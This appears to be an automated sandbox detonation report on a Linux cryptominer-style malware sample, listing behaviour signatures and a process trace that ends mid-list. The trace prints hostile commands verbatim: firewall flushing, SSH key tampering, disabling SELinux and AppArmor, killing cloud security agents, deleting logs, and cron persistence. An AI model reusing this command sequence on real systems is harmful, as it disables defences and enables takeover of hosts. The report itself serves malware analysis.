SHA1 5d9474c0309b7ca09a182d888f73b37a8fe1362c
SHA256 f0b5c2c2211c8d67ed15e75e656c7862d086e9245420892a7de62cd9ec582a06
SHA512 29b3573989378848e91465abb8bb12aaad1c40f01ddba6ce5dce4de88d61d49621cd4272bc6f889cd469e9490040b412eb0a237cf2cd49c637da1d5de5903f3d

/usr/bin/pamdicks

MD5 9ae0ea9e3c9c6e1b9b6252c8395efdc1
SHA1 ccf271b7830882da1791852baeca1737fcbe4b90
SHA256 06e9d52c1720fca412803e3b07c4b228ff113e303f4c7ab94665319d832bbfb7
SHA512 f3d08a4bfef201adbe711e8805f96ff13909719107dcac81f4fc9185040d59d8d573344a0707e697f8b4f0212e0d79f3bdd6b86688dd8c54019b9d93c937f3ca

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-30 01:04

Reported

2024-06-30 01:06

Platform

debian9-mipsbe-20240418-en

Max time kernel

150s

Max time network

139s

Command Line

[/tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown]

Signatures

Adds new SSH keys

persistence
Description Indicator Process Target
File opened for modification /root/.ssh/authorized_keys /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Executes dropped EXE

Description Indicator Process Target
N/A /etc/zzh N/A N/A
N/A /bin/ps N/A N/A
N/A /bin/ps N/A N/A

Flushes firewall rules

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /sbin/iptables N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Writes DNS configuration

Description Indicator Process Target
File opened for modification /etc/resolv.conf /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /bin/grep N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A

Creates/modifies Cron job

persistence
Description Indicator Process Target
File opened for modification /etc/cron.d/zzh /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /etc/crontab /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /etc/cron.daily/logrotate /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /etc/cron.hourly/0anacron /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Deletes log files

Description Indicator Process Target
File truncated /var/log/wtmp /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File truncated /var/log/secure /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Disables AppArmor

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/local/sbin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /sbin/systemctl N/A
N/A N/A /bin/systemctl N/A
N/A N/A /usr/local/bin/systemctl N/A
N/A N/A N/A N/A
N/A N/A /usr/local/sbin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/sbin/systemctl N/A
N/A N/A /usr/bin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /bin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /bin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /bin/systemctl N/A
N/A N/A /usr/sbin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/local/bin/systemctl N/A
N/A N/A /sbin/systemctl N/A
N/A N/A /bin/systemctl N/A
N/A N/A /usr/bin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /bin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Disables SELinux

Description Indicator Process Target
N/A N/A /usr/bin/kill N/A
N/A N/A /bin/kill N/A
N/A N/A /bin/grep N/A
N/A N/A /bin/grep N/A
N/A N/A /usr/sbin/setenforce N/A
N/A N/A /usr/sbin/kill N/A
N/A N/A /sbin/kill N/A
N/A N/A /bin/grep N/A
N/A N/A /bin/grep N/A
N/A N/A /usr/local/sbin/kill N/A
N/A N/A /usr/local/bin/kill N/A

Enumerates running processes

Modifies rc script

persistence
Description Indicator Process Target
File opened for modification /etc/rc.d/rc.local /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Write file to user bin folder

Description Indicator Process Target
File opened for modification /usr/bin/irqbalanced /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/rctlcli /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/systemd-network /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/pamdicks /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/ip6network /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/kswaped /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /bin/top /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /bin/top N/A N/A
File opened for modification /bin/pstree /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /bin/pstree N/A N/A
File opened for modification /bin/ps /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /bin/ps N/A N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/kill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/5/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/356/stat /bin/ps N/A
File opened for reading /proc/10/status N/A N/A
File opened for reading /proc/19/status N/A N/A
File opened for reading /proc/73/stat /bin/ps N/A
File opened for reading /proc/9/stat /bin/ps N/A
File opened for reading /proc/filesystems /bin/ps N/A
File opened for reading /proc/17/cmdline /bin/ps N/A
File opened for reading /proc/18/cmdline /bin/ps N/A
File opened for reading /proc/330/status N/A N/A
File opened for reading /proc/665/status N/A N/A
File opened for reading /proc/18/status /usr/bin/pgrep N/A
File opened for reading /proc/9/status N/A N/A
File opened for reading /proc/709/status N/A N/A
File opened for reading /proc/uptime /bin/ps N/A
File opened for reading /proc/19/status /bin/ps N/A
File opened for reading /proc/709/status N/A N/A
File opened for reading /proc/171/cmdline N/A N/A
File opened for reading /proc/329/status N/A N/A
File opened for reading /proc/8/cmdline /bin/ps N/A
File opened for reading /proc/11/cmdline /bin/ps N/A
File opened for reading /proc/424/status N/A N/A
File opened for reading /proc/330/cmdline /bin/ps N/A
File opened for reading /proc/150/cmdline /bin/ps N/A
File opened for reading /proc/21/stat /bin/ps N/A
File opened for reading /proc/9/status /usr/bin/pgrep N/A
File opened for reading /proc/18/cmdline N/A N/A
File opened for reading /proc/24/cmdline N/A N/A
File opened for reading /proc/122/cmdline /bin/ps N/A
File opened for reading /proc/227/stat /bin/ps N/A
File opened for reading /proc/16/stat /bin/ps N/A
File opened for reading /proc/14/status /bin/ps N/A
File opened for reading /proc/121/status N/A N/A
File opened for reading /proc/330/cmdline /bin/ps N/A
File opened for reading /proc/73/status N/A N/A
File opened for reading /proc/75/status N/A N/A
File opened for reading /proc/424/cmdline N/A N/A
File opened for reading /proc/710/status N/A N/A
File opened for reading /proc/76/status N/A N/A
File opened for reading /proc/7/stat /bin/ps N/A
File opened for reading /proc/self/stat /bin/ps N/A
File opened for reading /proc/356/cmdline /bin/ps N/A
File opened for reading /proc/75/cmdline N/A N/A
File opened for reading /proc/710/cmdline /bin/ps N/A
File opened for reading /proc/1/stat /bin/ps N/A
File opened for reading /proc/17/stat /bin/ps N/A
File opened for reading /proc/2/cmdline N/A N/A
File opened for reading /proc/665/status /bin/ps N/A
File opened for reading /proc/16/cmdline /bin/ps N/A
File opened for reading /proc/76/status N/A N/A
File opened for reading /proc/sys/kernel/osrelease N/A N/A
File opened for reading /proc/707/cmdline /bin/ps N/A
File opened for reading /proc/710/stat /bin/ps N/A
File opened for reading /proc/330/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/355/cmdline N/A N/A
File opened for reading /proc/154/status N/A N/A
File opened for reading /proc/710/cmdline /bin/ps N/A
File opened for reading /proc/3/status /bin/ps N/A
File opened for reading /proc/73/status N/A N/A
File opened for reading /proc/710/status /bin/ps N/A
File opened for reading /proc/80/status N/A N/A
File opened for reading /proc/708/cmdline N/A N/A
File opened for reading /proc/111/status N/A N/A
File opened for reading /proc/375/stat /bin/ps N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/dev/null /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /tmp/svcupdate /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /tmp/fileutl.message.0QZDyl N/A N/A
File opened for modification /tmp/.ice-unix/.../.watch N/A N/A
File opened for modification /tmp/fileutl.message.hJIZoh N/A N/A
File opened for modification /tmp/fileutl.message.CeARw2 N/A N/A
File opened for modification /tmp/fileutl.message.bPx93K N/A N/A
File opened for modification /tmp/kdevtmpfsi /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /tmp/fileutl.message.xRu3Dk N/A N/A
File opened for modification /tmp/fileutl.message.WR6cwC N/A N/A
File opened for modification /tmp/fileutl.message.mCEC5Q N/A N/A
File opened for modification /tmp/fileutl.message.Gynyzs N/A N/A
File opened for modification /tmp/fileutl.message.2p2mkg N/A N/A
File opened for modification /tmp/svcguard /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /tmp/fileutl.message.6YHXHu N/A N/A
File opened for modification /tmp/fileutl.message.9hx6UZ N/A N/A
File opened for modification /tmp/fileutl.message.0KXt8D N/A N/A

Processes

/tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown

[/tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown]

/bin/chmod

[chmod 777 /usr/bin/chattr]

/bin/chmod

[chmod 777 /bin/chattr]

/usr/bin/chattr

[chattr -iua /tmp/]

/usr/bin/chattr

[chattr -iua /var/tmp/]

/sbin/iptables

[iptables -F]

/usr/bin/chattr

[chattr -iae /root/.ssh/]

/usr/bin/chattr

[chattr -iae /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -iua /tmp/]

/usr/bin/chattr

[chattr -iua /var/tmp/]

/bin/rm

[rm -rf /tmp/addres*]

/bin/rm

[rm -rf /tmp/walle*]

/bin/rm

[rm -rf /tmp/keys]

/bin/rm

[rm -rf /var/log/syslog]

/bin/sync

[sync]

/bin/cat

[cat /var/spool/cron/]

/bin/cat

[cat /root/.ssh/authorized_keys]

/bin/mv

[mv /usr/bin/wgettnt /usr/bin/wd1]

/bin/mv

[mv /usr/bin/curltnt /usr/bin/cd1]

/bin/mv

[mv /usr/bin/wget1 /usr/bin/wd1]

/bin/mv

[mv /usr/bin/curl1 /usr/bin/cd1]

/bin/mv

[mv /usr/bin/cur /usr/bin/cd1]

/bin/mv

[mv /usr/bin/cdl /usr/bin/cd1]

/bin/mv

[mv /usr/bin/cdt /usr/bin/cd1]

/bin/mv

[mv /usr/bin/xget /usr/bin/wd1]

/bin/mv

[mv /usr/bin/wge /usr/bin/wd1]

/bin/mv

[mv /usr/bin/wdl /usr/bin/wd1]

/bin/mv

[mv /usr/bin/wdt /usr/bin/wd1]

/bin/mv

[mv /usr/bin/wget /usr/bin/wd1]

/bin/mv

[mv /usr/bin/curl /usr/bin/cd1]

/bin/ps

[ps aux]

/bin/grep

[grep -i [a]liyun]

/bin/grep

[grep -i [y]unjing]

/bin/ps

[ps aux]

/usr/sbin/setenforce

[setenforce 0]

/usr/sbin/service

[service apparmor stop]

/usr/bin/basename

[basename /usr/sbin/service]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/usr/local/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/usr/local/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/usr/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/usr/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/bin/systemctl

[systemctl disable apparmor]

/usr/sbin/service

[service aliyun.service stop]

/usr/bin/basename

[basename /usr/sbin/service]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/usr/local/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/usr/local/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/usr/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/usr/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/bin/systemctl

[systemctl disable aliyun.service]

/bin/ps

[ps aux]

/bin/grep

[grep -v grep]

/bin/grep

[grep aegis]

/usr/bin/awk

[awk {print $2}]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep Yun]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs rm -rf]

/usr/bin/xargs

[xargs dirname]

/usr/bin/awk

[awk {print $11}]

/bin/grep

[grep aegis]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/local/sbin/dirname

[dirname]

/usr/local/bin/dirname

[dirname]

/usr/sbin/dirname

[dirname]

/usr/bin/dirname

[dirname]

/usr/local/sbin/rm

[rm -rf]

/usr/local/bin/rm

[rm -rf]

/usr/sbin/rm

[rm -rf]

/usr/bin/rm

[rm -rf]

/sbin/rm

[rm -rf]

/bin/rm

[rm -rf]

/usr/bin/xargs

[xargs rm -rf]

/usr/bin/xargs

[xargs dirname]

/usr/bin/awk

[awk {print $11}]

/bin/grep

[grep hids]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/local/sbin/dirname

[dirname]

/usr/local/bin/dirname

[dirname]

/usr/sbin/dirname

[dirname]

/usr/bin/dirname

[dirname]

/usr/local/sbin/rm

[rm -rf]

/usr/local/bin/rm

[rm -rf]

/usr/sbin/rm

[rm -rf]

/usr/bin/rm

[rm -rf]

/sbin/rm

[rm -rf]

/bin/rm

[rm -rf]

/usr/bin/xargs

[xargs rm -rf]

/usr/bin/xargs

[xargs dirname]

/usr/bin/awk

[awk {print $11}]

/bin/grep

[grep cloudwalker]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/local/sbin/dirname

[dirname]

/usr/local/bin/dirname

[dirname]

/usr/sbin/dirname

[dirname]

/usr/bin/dirname

[dirname]

/usr/local/sbin/rm

[rm -rf]

/usr/local/bin/rm

[rm -rf]

/usr/sbin/rm

[rm -rf]

/usr/bin/rm

[rm -rf]

/sbin/rm

[rm -rf]

/bin/rm

[rm -rf]

/usr/bin/xargs

[xargs rm -rf]

/usr/bin/xargs

[xargs dirname]

/usr/bin/awk

[awk {print $11}]

/bin/grep

[grep titanagent]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/local/sbin/dirname

[dirname]

/usr/local/bin/dirname

[dirname]

/usr/sbin/dirname

[dirname]

/usr/bin/dirname

[dirname]

/usr/local/sbin/rm

[rm -rf]

/usr/local/bin/rm

[rm -rf]

/usr/sbin/rm

[rm -rf]

/usr/bin/rm

[rm -rf]

/sbin/rm

[rm -rf]

/bin/rm

[rm -rf]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep edr]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep aegis]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep Yun]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep hids]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep edr]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep cloudwalker]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep titanagent]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep sgagent]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep barad_agent]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep hostguard]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/rm

[rm -rf /usr/local/aegis]

/bin/sleep

[sleep 1]

/usr/bin/chattr

[chattr -i /usr/bin/ip6network]

/usr/bin/chattr

[chattr -i /usr/bin/kswaped]

/usr/bin/chattr

[chattr -i /usr/bin/irqbalanced]

/usr/bin/chattr

[chattr -i /usr/bin/rctlcli]

/usr/bin/chattr

[chattr -i /usr/bin/systemd-network]

/usr/bin/chattr

[chattr -i /usr/bin/pamdicks]

/usr/bin/chattr

[chattr +i /usr/bin/ip6network]

/usr/bin/chattr

[chattr +i /usr/bin/kswaped]

/usr/bin/chattr

[chattr +i /usr/bin/irqbalanced]

/usr/bin/chattr

[chattr +i /usr/bin/rctlcli]

/usr/bin/chattr

[chattr +i /usr/bin/systemd-network]

/usr/bin/chattr

[chattr +i /usr/bin/pamdicks]

/bin/sleep

[sleep 1]

/bin/rm

[rm -f /tmp/.null]

/sbin/sysctl

[sysctl -w vm.nr_hugepages=128]

/usr/bin/awk

[awk {print $7}]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep 194.87.139.103]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep 185.71.65.238]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep 140.82.52.87]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :23]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :143]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :2222]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :3333]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

